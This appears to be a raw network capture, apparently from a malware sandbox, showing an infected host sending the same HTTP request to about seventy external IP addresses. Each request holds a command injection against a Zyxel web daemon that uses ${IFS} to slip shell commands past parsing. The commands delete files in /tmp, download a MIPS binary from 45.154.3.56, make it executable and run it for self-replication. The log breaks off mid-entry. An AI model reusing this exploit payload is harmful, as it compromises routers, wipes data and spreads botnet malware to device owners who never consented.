                        Session IDSource IPSource PortDestination IPDestination Port
                        2345192.168.2.1449100165.200.176.234443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155303001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2346192.168.2.143783238.60.29.216443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155337095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2347192.168.2.146095080.151.72.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155384064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2348192.168.2.1443468156.109.89.205443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155421972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2349192.168.2.1441350157.103.136.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155474901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2350192.168.2.1456400164.17.190.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155529022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2351192.168.2.1444366104.202.103.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155560017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2352192.168.2.1454264145.182.197.44443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155589104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2353192.168.2.145803648.82.109.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155637026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2354192.168.2.144864692.15.249.203443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155683994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2355192.168.2.1445690130.94.8.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155713081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2356192.168.2.144186050.57.90.127443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155782938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2357192.168.2.144125260.29.228.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155806065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2358192.168.2.143854414.197.204.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155833960 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2359192.168.2.144188432.239.30.81443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155884981 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2360192.168.2.143361844.126.75.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155914068 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2361192.168.2.1443250118.45.187.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155947924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2362192.168.2.1436468124.122.207.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156018972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2363192.168.2.144803645.77.137.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156048059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2364192.168.2.144934684.228.215.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156092882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2365192.168.2.144551035.26.139.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156174898 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2366192.168.2.1450580182.165.98.68443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156204939 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2367192.168.2.1448924140.64.212.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156251907 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2368192.168.2.143459662.181.121.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156287909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2369192.168.2.14505185.4.43.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156351089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2370192.168.2.145489652.15.40.163443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156403065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2371192.168.2.1438432152.20.110.154443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156405926 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2372192.168.2.1455624162.122.164.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156433105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2373192.168.2.1441932120.138.64.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156466961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2374192.168.2.1458310123.155.52.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156512022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2375192.168.2.1447480120.209.116.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156563997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2376192.168.2.1435052183.255.244.171443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156591892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2377192.168.2.1460214126.188.105.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156652927 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2378192.168.2.146019637.144.73.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156702995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2379192.168.2.143293024.242.82.239443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156738043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2380192.168.2.145016612.252.56.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156779051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2381192.168.2.143444844.171.14.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156826973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2382192.168.2.146028067.121.3.73443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156855106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2383192.168.2.1434776156.46.73.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156903982 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2384192.168.2.146088227.231.247.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156951904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2385192.168.2.143462098.199.141.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.156976938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2386192.168.2.1440428146.101.47.27443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157025099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2387192.168.2.145402440.8.207.75443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157057047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2388192.168.2.1455594156.233.124.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157094955 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2389192.168.2.145018814.23.239.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157161951 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2390192.168.2.1438370182.29.218.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157179117 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2391192.168.2.1445104103.3.56.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157226086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2392192.168.2.143421270.193.140.29443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157254934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2393192.168.2.1452580217.209.174.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157284021 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2394192.168.2.145087451.1.164.235443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157346010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2395192.168.2.1443162187.66.30.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157377005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2396192.168.2.144234414.32.156.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157428980 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2397192.168.2.1445964153.177.125.117443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157495022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2398192.168.2.146036688.119.6.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157521009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2399192.168.2.14590821.181.161.190443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157552004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2400192.168.2.1440908194.48.223.116443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157594919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2401192.168.2.1434832115.135.173.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157644987 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2402192.168.2.14468141.207.118.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157704115 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2403192.168.2.1448266125.6.190.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157742023 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2404192.168.2.1455052146.121.225.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157805920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2405192.168.2.1445078201.56.203.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157835007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2406192.168.2.145484281.135.128.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157865047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2407192.168.2.1443244182.160.102.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157887936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2408192.168.2.144758259.81.227.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.157968044 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2409192.168.2.143483491.233.248.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158009052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2410192.168.2.1454258207.99.198.245443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158056974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2411192.168.2.1438662145.144.212.110443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158107042 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2412192.168.2.145028498.200.63.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158139944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2413192.168.2.1456854170.12.193.247443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.158184052 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2414192.168.2.145652092.80.89.243443
                        TimestampBytes transferredDirectionData
